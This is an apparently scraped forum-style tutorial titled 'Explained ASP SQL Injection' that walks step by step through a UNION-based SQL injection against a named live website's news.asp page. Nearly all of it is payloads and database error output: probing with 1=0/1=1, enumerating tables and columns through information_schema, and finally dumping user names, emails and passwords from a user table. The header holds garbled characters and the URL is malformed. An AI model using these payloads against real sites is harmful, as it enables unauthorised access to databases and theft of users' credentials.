Explained ASP SQL Injection
secure-hiphop鐨勭┖闂
I tested it on http://http://www.zjjv.com///news.asp?id=2
step 2: add after 2 with space; and 1=0 OR and 1=1
so: http://http://www.zjjv.com///news.asp?id=2 and 1=0
By 1=0 you should get an error, or empty page like:
Code:ADODB.Field error 80020009
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/default.asp, line 0
and with 1=1 you need to get a normal page.
step 3: add after the 2 without space (yes remove step 2 text) ;
Code:+union+select+0+from+onzin
then you should get an error like:
Code:Microsoft OLE DB Provider for ODBC Drivers error 80040e37
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table ssk2006.onzin doesnt exist
/inc/extra.asp, line 110
step 4: Then the database is:: ssk2006
step 5: (yes, remove everything after 2)
Code:+union+select+0+from+information_schema.tables
OR go ahead until you get an error like:
Code:Type mismatch
So like this:
Code:+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables
Until then you get this error:
Code:The used SELECT statement......
step 6: Now we are almost done!!
step 7: Change from: http://http://www.zjjv.com///news.asp?id=2 to http://..../news.asp?id=-2
(i changed 2 to -2 .. saying this because some dont see it :tongue:)
Then the name of the frame/title must change to a number. (7 here for example)
step 8: Then you make from that number what you see "table_name" (without quotes) instead of 7 and then you get the name: CHARACTERS_SETS.
step 9: then you put behind: (7 is changed by table_name because of that number :pinch: )
Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+
where+table_schema=ssk2006
the frame name changes to a table name like tblUsers.
put +limit+1,1 after the databasename to check inside the tblUsers:
step9:
Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+
where+table_schema=ssk2006+limit+1,1
(ssk2006 is the database again)
Go ahead with counting up:
Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+
where+table_schema=ssk2006+limit+2,1
(or 3,1 of 4,1 ect ect)
until you get something with tblUser or something else with User. (Its still Type mismatch !)
step 10: tblUser is the table of the users!! yeah found
step 11: change
Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+
where+table_schema=ssk2006+limit+1,1
to:
Code:+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+
table_name=tblUser
Then you get again a number (7 for example, with still Type mismatch!)
step 12: change the number to column_name ; so you get this:
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+
where+table_name=tblUser
Then you see something like iUserID (or ex. login)
step 13: change
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+
where+table_name=tblUser
to:
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+
where+table_name=tblUser+limit+1,1
Write everything down what you get; like;
Code:iUserActive , sUserName,sPassword ect ect
with the method limit 1,1 keep making it higher : 2,1 - 3,1 - 4,1 etc
step 14: change
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+
where+table_name=tblUser+limit+4,1
to
Code:+union+select+0,1,2,3,4,5,6,sUserId,8,9,10,11,12+from+tblUser
step 15: Now you have finished SQL injection
Code:sUserName (ex: admin)
sUserEmail (ex: webmaster@site.com)
sUserLogin (ex: administrator)
sUserPassword (ex: donthackme1)
